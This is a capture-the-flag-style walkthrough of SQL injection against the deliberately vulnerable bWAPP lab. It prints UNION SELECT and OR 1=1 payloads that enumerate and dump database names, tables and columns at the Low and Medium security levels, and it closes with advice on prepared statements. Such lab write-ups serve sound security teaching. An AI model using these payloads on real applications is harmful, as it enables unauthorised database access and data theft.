In this walk through, we will be going through the SQL Injection (GET/Select) vulnerability section from bWAPP Labs. We will be exploring and exploiting SQL Injection in GET request and select buttons and learn how application are affected because of it. So, let’s get started with the Hacking without any delay.
Table of Contents
Security: Low
- Setting the security level to Low.
- The application has a select functionality which is used to select movies as per the user’s wish and display information regarding that. As per the Burp intercept it issues a GET Request to sqli_2.php file which in turns displays the output from the DB.
- I used the apostrophe (‘) at the end of the movie ID which causes an error. That’s good as it might be vulnerable to SQL injection.
'
- I used the below payload where i input an out of scope movie ID along with a TRUE statement and got a positive response.
999+OR+1=1--+-
- Next, i found the no. of columns using the below payloads. We will start by checking the no. of columns in the database. For that, we used ORDER BY clause, as we can see we hit an “Unknown column” error on column 8 but no error on column 7. That means, there are 7 columns in the DB.
1+ORDER+BY+10--+- 1+ORDER+BY+8--+- 1+ORDER+BY+7--+-
- Let’s find out which column can be used to retrieve data. Here, the second data got reflected in the front end.
999+UNION+SELECT+NULL,"asd",NULL,NULL,NULL,NULL,NULL--+-
- Moving on, let’s dump the database name using the below payload.
999+UNION+SELECT+NULL,database(),NULL,NULL,NULL,NULL,NULL--+-
- Now we have our database name “bWAPP”. Let’s find out the tables inside it using the below payload.
999+UNION+SELECT+NULL,table_name,NULL,NULL,NULL,NULL,NULL+from+information_schema.tables+where+table_schema=database()--+-
- We got a table named “blog”, nothing sensational but let’s still check the columns inside it with the below payload.
999+UNION+SELECT+NULL,column_name,NULL,NULL,NULL,NULL,NULL+from+information_schema.columns+where+table_name='blog'--+-
- Got an “id” column. On checking it, found nothing.
999+UNION+SELECT+NULL,id,NULL,NULL,NULL,NULL,NULL+from+blog--+-
Security: Medium
- Setting the security level to Medium.
- I used the below payload and it worked in medium level too as we got a positive response.
9999+OR+1=1;
Security: High
- Setting the security level to High.
- Unable to produce error in high level as the application is using prepared statements.
Also Read: bWAPP – SQL Injection (AJAX,JSON,jQuery)
Conclusion:
So, we finally completed all the security levels for the bWAPP SQL Injection (GET/Select) Vulnerability. We looked into the various ways how application has been set up in various levels and how we can bypass the security controls implemented. Next, we can mitigate the potential SQL Injection attacks by performing input sanitization and using prepared statements or parametrized queries for every SQL query made by the application to the database. On that note, i will take your leave and will meet you in next one with another bWAPP vulnerability writeup, till then “Keep Hacking”.